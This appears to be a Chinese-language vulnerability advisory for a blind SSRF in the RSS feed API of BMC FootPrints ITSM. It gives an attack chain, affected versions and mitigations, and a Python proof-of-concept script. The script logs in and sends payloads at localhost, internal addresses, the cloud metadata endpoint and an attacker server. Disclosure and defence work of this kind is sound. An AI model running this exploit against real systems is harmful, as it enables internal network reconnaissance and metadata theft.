CVE-2025-71259 BMC FootPrints ITSM blind SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-71259

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BMC FootPrints ITSM

漏洞概述

CVE-2025-71259是BMC FootPrints ITSM中发现的一个盲服务端请求伪造（Blind SSRF）漏洞。该漏洞存在于externalfeed/RSS API组件中，影响版本从20.20.02到20.24.01.001。攻击者可以利用该漏洞通过认证账户向服务器发送精心构造的请求，诱使服务器向任意内部或外部资源发起请求。由于是盲SSRF，攻击者无法直接获取响应数据，但可以通过时间延迟或外部资源交互来验证漏洞利用。攻击者能够利用验证不足的外部资源引用与内部服务进行交互，或通过大量请求造成资源耗尽，影响系统可用性。该漏洞CVSS评分为4.3，属于中等严重程度，需要低权限认证即可利用，无需用户交互。

技术细节

该漏洞位于BMC FootPrints ITSM的externalfeed/RSS API端点。漏洞根源在于应用程序对用户提供的URL参数缺乏充分的验证和过滤。攻击者（已认证用户）可以指定任意URL作为RSS feed源，服务器会不加区分地向该URL发起HTTP请求。攻击者可以利用此行为探测内部网络服务（如localhost、192.168.x.x等内网地址）、访问云元数据端点（如AWS 169.254.169.254）、或通过发送大量请求造成DoS攻击。由于服务器不会将请求响应返回给客户端（盲SSRF特性），攻击者需要通过时间差异（如响应延迟）或观察外部可见的请求日志来确认漏洞利用成功。此漏洞与WatchTowr实验室披露的BMC FootPrints预认证RCE链可能存在关联，SSRF常被用作攻击链中的侦察或绕过阶段。

攻击链分析

STEP 1

步骤1

攻击者获取BMC FootPrints ITSM的低权限账户（通过默认凭证、弱密码或社会工程学）

STEP 2

步骤2

攻击者访问externalfeed/RSS API端点，构造包含内网地址或恶意URL的请求参数

STEP 3

步骤3

服务器接收到请求后，向攻击者指定的URL发起HTTP请求（SSRF）

STEP 4

步骤4

通过时间延迟或外部可控服务器接收请求日志，攻击者确认SSRF利用成功并获取内网信息

STEP 5

步骤5

利用SSRF探测到的内网服务信息，结合其他漏洞（如RCE）进行进一步攻击，或通过大量请求造成资源耗尽

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-71259 BMC FootPrints ITSM Blind SSRF PoC
# Target: externalfeed/RSS API endpoint
# Authentication required (low-privilege user)

def exploit_ssrf(target_url, attacker_server, credentials):
    """
    Exploit blind SSRF in BMC FootPrints ITSM externalfeed/RSS API
    
    Args:
        target_url: Base URL of BMC FootPrints ITSM (e.g., https://target.com)
        attacker_server: Attacker's controlled server to receive requests
        credentials: Dict with 'username' and 'password'
    """
    session = requests.Session()
    
    # Step 1: Authenticate with low-privilege account
    login_url = f"{target_url}/GoIn/LogIn.dll?R=1"
    login_data = {
        'username': credentials['username'],
        'password': credentials['password']
    }
    
    print(f"[*] Authenticating as {credentials['username']}...")
    response = session.post(login_url, data=login_data)
    
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Exploit SSRF via externalfeed/RSS API
    ssrf_url = f"{target_url}/externalfeed/RSS"
    
    # Internal service probing (SSRF payload examples)
    payloads = [
        f"http://localhost:80/",
        f"http://127.0.0.1:8080/",
        f"http://169.254.169.254/latest/meta-data/",  # Cloud metadata
        f"http://{attacker_server}/",
        f"http://192.168.1.1:80/"
    ]
    
    print(f"[*] Sending SSRF payloads to {ssrf_url}...")
    
    for payload in payloads:
        params = {'url': payload}
        try:
            response = session.get(ssrf_url, params=params, timeout=10)
            print(f"[+] Payload sent: {payload}")
        except requests.exceptions.Timeout:
            print(f"[!] Timeout for payload: {payload} (may indicate successful SSRF)")
        except Exception as e:
            print(f"[-] Error with payload {payload}: {str(e)}")
    
    print("[*] SSRF exploitation completed")
    print("[*] Check attacker_server logs for incoming requests from target")
    return True

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-71259.py <target_url> <attacker_server> <username> <password>")
        print("Example: python cve-2025-71259.py https://footprints.example.com http://attacker.com:8080 user pass")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker = sys.argv[2]
    creds = {'username': sys.argv[3], 'password': sys.argv[4]}
    
    exploit_ssrf(target, attacker, creds)

影响范围

BMC FootPrints ITSM 20.20.02

BMC FootPrints ITSM 20.20.03.002之前版本

BMC FootPrints ITSM 20.21.01.001之前版本

BMC FootPrints ITSM 20.21.02.002之前版本

BMC FootPrints ITSM 20.22.01

BMC FootPrints ITSM 20.22.01.001之前版本

BMC FootPrints ITSM 20.23.01

BMC FootPrints ITSM 20.23.01.002之前版本

BMC FootPrints ITSM 20.24.01之前版本

防御指南

临时缓解措施

如果无法立即应用官方补丁，可采取以下临时缓解措施：1）限制用户对externalfeed/RSS API的访问权限，仅允许必要的管理员账户使用该功能；2）在网络边界实施 egress filtering，阻止服务器直接访问内网IP段；3）部署WAF规则拦截包含内网地址或非常见域名的RSS feed请求；4）监控应用日志关注异常的externalfeed请求模式；5）考虑暂时禁用RSS feed功能直到补丁可用。